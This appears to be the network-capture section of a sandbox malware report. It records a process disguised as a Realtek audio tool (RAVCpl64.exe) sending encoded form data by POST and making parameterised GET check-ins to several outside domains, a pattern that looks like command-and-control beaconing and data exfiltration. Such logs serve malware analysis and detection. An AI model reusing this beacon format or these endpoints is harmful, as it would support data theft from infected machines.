                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 49807 | 13.248.169.48 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:38.443126917 CET | 755 | OUT | POST /a42x/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              Origin: http://www.remedies.pro
                                                                                                                                                                              Referer: http://www.remedies.pro/a42x/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=+l3Gyggz05qvmFRJNW5tUM0qK3H/vtI1SIKaKHmiI0et3LIv/JkuS0BGOpFzuJbAs1NqK181aj+eSVOCNqSWMfaMR7o61OIVEE/ljVdrtUWxsBRNfYYhACIScfJr04ekSMgIiYfYQvbmJQKtiO4L+sHiM1fBmYbn/AoYjkp5VTzd8OHRM/x/LMT9zH+WL6UUHg==
Jan 11, 2025 03:58:38.580456972 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 49808 | 13.248.169.48 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:42.125760078 CET | 775 | OUT | POST /a42x/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              Origin: http://www.remedies.pro
                                                                                                                                                                              Referer: http://www.remedies.pro/a42x/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=+l3Gyggz05qv0VhJdH5tFs0lEXH/lNJ8SIOaKGyyLGqt3uMvxtwuR0BGGJF6gpaCs1BYKx01ajqeSQyCNbSVWvaKdbok7uIVEE/ljVYAtQyxvxBNe6gufyIRdfJriIe4SMhdiZD+QsjmJR6tif4El8HkDVexwb2M5AclsE9fUmqlw4KLRNFbIfPP33H+J4VPaobsqus5nQ2mdax/HCf3Wnw=
Jan 11, 2025 03:58:42.261383057 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49809 | 13.248.169.48 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:45.797969103 CET | 2578 | OUT | POST /a42x/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              Origin: http://www.remedies.pro
                                                                                                                                                                              Referer: http://www.remedies.pro/a42x/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:58:45.797992945 CET | 2578 | OUT
                                                                                                                                                                              Data Ascii: 8NRP0KoTJHNebm3+3cYRiZPr08nwtk1vjuednHCAhAFMCRjAZtcwFb+Mh5CSEpvzWTLfojOd2IuNCV7eLR2yeuOl4G2Rw+ML2T6P4PIwey4Lzz72bhTknEnKumGyINL3BB4bEwPd3wCAWevL0RqiKM6spZ+h0WGAQScDjslz//m75eAXdaiy8axCv3uq4hj6xmuA0A9RQoNXktJlBjvJRlrg3RSV2K2KW3d/2qmSz6bpQPUOJc+
                                                                                                                                                                              Jan 11, 2025 03:58:45.934653044 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close
                                                                                                                                                                              Jan 11, 2025 03:58:45.934839010 CET | 2578 | OUT
                                                                                                                                                                              Data Ascii: oe2aGiylOq8LhwdWGXUhb4wpFcn6xCmPTLy59PGUwd6axHj0dULG2Ny1L+m4djlbjJj8aobALRgzAnSdwA3hvS+FPjQntxn3QmGuQ5eXqz7o17A4IC6FCd6vO7YtJ7BwCFD4b1xlRNJZuJW9Fp7cIwlr9q/6WtDqSZh+3M0RNEpGFJs+JvXDicCljPC3EUseFs1//5CjdJC7u/VkFXiIeSrc+Iq55BDEH0z2EqG1oe/Bh9sb/vt
                                                                                                                                                                              Jan 11, 2025 03:58:45.935010910 CET | 190 | OUT
                                                                                                                                                                              Data Ascii: ofqwOoUcMih1AqffM/1CtUlUjB2oRaoJfjmorN/P1iWo11BGiTIn3ITxJml1DQVh5tXdP/A7SJvu3dFbALSSHKDnUcJt3Ts9XAS8r/PbcuUikW3uXYJQV45iEK2omfwYLBwLT2QDAgb0bPZy5M0Cu3vBrJ69/rDdFVSnroi4OzdLIobIHOwolch76cxQ==


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              52 | 192.168.11.20 | 49810 | 13.248.169.48 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 03:58:49.483393908 CET | 487 | OUT | GET /a42x/?iS=znfmxVkt4djGk3tmdywtQtJLNg3HiKZ6UNOVA1+QIiGE450155grImBaO89el+v6jlItDAosRwyNbj2dKq66Sb72cNgps88pEUX63gxtlS2fkXN4XLEQUlk=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:58:50.627265930 CET | 371 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:50 GMT
                                                                                                                                                                              content-length: 250
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?iS=znfmxVkt4djGk3tmdywtQtJLNg3HiKZ6UNOVA1+QIiGE450155grImBaO89el+v6jlItDAosRwyNbj2dKq66Sb72cNgps88pEUX63gxtlS2fkXN4XLEQUlk=&Bi=zJ_w6yPG"}</script></head></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              53 | 192.168.11.20 | 49811 | 202.92.5.23 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 03:59:00.010648966 CET | 489 | OUT | GET /fev0/?Bi=zJ_w6yPG&iS=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.thaor56.online
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:59:00.368762016 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:59:00 GMT
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:59:00.368792057 CET | 181 | IN
                                                                                                                                                                              Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              54 | 192.168.11.20 | 49812 | 76.223.54.146 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 03:59:08.542073965 CET | 767 | OUT | POST /98j3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==
                                                                                                                                                                              Jan 11, 2025 03:59:08.677784920 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              55 | 192.168.11.20 | 49813 | 76.223.54.146 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 03:59:11.199618101 CET | 787 | OUT | POST /98j3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj402OC0YzffSTGIUVBsWL3aqckRLQLYTOf0=
                                                                                                                                                                              Jan 11, 2025 03:59:11.335268021 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              56 | 192.168.11.20 | 49814 | 76.223.54.146 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 03:59:13.873342991 CET | 2578 | OUT | POST /98j3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on0/kOHrA9lbn5ZgOLx8Vw4jFS1FraxAgKHD6WCcADeMPKfVXsJl72mEX4xqGIrk/GnsSHq5itLqmpcXEKOpslByCa0rgEouJ+GEhES320ZN0L5fPgimOwq6JP95IEVKf5XRlbW8LCBC5MGjVn2EAG7mMVn/LSlfkdGMzFJIoB+DdMUHxjAd/IrcZAFkczTrM8wJdx+XKiyhUSs1hVPWbwulxqFx+6gGkijvIkmiqLjr0dq7BW5HCesUrv3ucOspXXZB/3c8r5dyEXJ66hHWD5r81tCaYpDxmjRvo/jznd5QlP3W3WgCkpayzq3lKeLjuufb8kX+Evyfs9DvdZN2E1GrL5AnSSZO1j+a3CxOjy0eI1g3WLflByff25nPKUMckPXwtyC0z+e0l2MlazgFK24mqrKgu4zBJt/20mJR4n4kwf/OAO014VFnHnAygNqsv4mFMLZflHRe5P7ibMZJzVe3TVCMuMCUeWuY66oUSd2/zTuiTj0llxJRwJ7FvofojWrynWoD26bxcSSlZIFOZCtAk6NfZWA8JDC6uDZq1gyMV1JIenMv3tIi1B0yo4dzGVLsDXl4a+zuVBnO0RZw8xnt7XTtFA1N4/ZWRV9GIl0XR4oq6628K/8g3jnC1Ni/CTt4Buvs3rChlMKB6IEV41oWom/ClHe+SF1/jmfMLLYfnzjZ7rK7EGOtBCGyXsHxiUMkPfngf1l5A/EDz3x2egmN+Y7WsIm2DoShSQShSGG9wA242FyiERXmmQHsL93XLtd3ZZZQQpu17HxBLdxJt6JZ5BysBBFVl5b0KgNn3vXGeqgcNQ/5BNVc1f1Ln+q87a+u0UJvgY [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:59:13.873366117 CET | 1289 | OUT
                                                                                                                                                                              Data Ascii: Go6WScpi1udu7n9/HEd0pXDuqzWf5TPx5qfRx6yQ2YNysV2f0MEyZXD4SlCGrjOqA8peLRc68EmajQGXITwyFrCJxQGLDeZUgXEHQ/wgvb+c/xje99+IsrsNuju/CJobZGoJ7d7JDDnKl/1NoL8GTsvqKy3jgN1vIUI04OUaoe0rx7MNrRD2YDcE/lE3OL2FEFaY42kjetwTeoOjw7QscHXiuLv3HuiIlkLcHm0HmlGrcSKcY92
                                                                                                                                                                              Jan 11, 2025 03:59:13.873442888 CET4069OUTData Raw: 4b 42 53 59 5a 59 75 45 36 49 55 75 67 4c 6d 79 72 34 37 32 47 52 34 73 43 41 51 5a 45 31 4a 4f 6e 6f 6e 4e 73 64 49 32 6d 54 37 62 67 32 6e 45 52 42 43 42 64 43 52 36 55 38 69 35 70 55 4d 72 33 65 41 77 30 53 32 65 69 44 70 43 35 67 4b 74 4e 33
                                                                                                                                                                              Data Ascii: KBSYZYuE6IUugLmyr472GR4sCAQZE1JOnonNsdI2mT7bg2nERBCBdCR6U8i5pUMr3eAw0S2eiDpC5gKtN3KxmR1U9LOx6eGecFOENoBQa8iunx+MtAJpTBCVcxVDCXILaX48LlPa19vZWH06A4dyiXjKLItdiN7AM6EC7t+qCSzRIniaZgZ0OLkrOmO9nkJbF7rusaDu1JRyQ6YG69s6vijLqdV9M+vtZS8ovg7yeH4CTvdfxmj
Jan 11, 2025 03:59:14.010114908 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.11.20 | 49815 | 76.223.54.146 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:17.554754019 CET | 491 | OUT | GET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:59:17.697875023 CET | 371 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:59:17 GMT
                                                                                                                                                                              content-length: 250
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.11.20 | 49816 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:22.889581919 CET | 761 | OUT | POST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
Jan 11, 2025 03:59:23.068051100 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:22 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49817 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:25.591824055 CET | 781 | OUT | POST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
Jan 11, 2025 03:59:25.769299984 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:25 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.11.20 | 49818 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:28.294581890 CET | 2578 | OUT | POST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:59:28.474991083 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:28 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49819 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:30.995647907 CET | 489 | OUT | GET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:59:31.175900936 CET | 199 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:31 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 48
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Ascii: fuk5TczouLXrnzenTNKlb4iS+3Oi+UjlEFfdF8bseG32yhG3


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.11.20 | 49827 | 27.124.4.246 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:41.488176107 CET | 755 | OUT | POST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
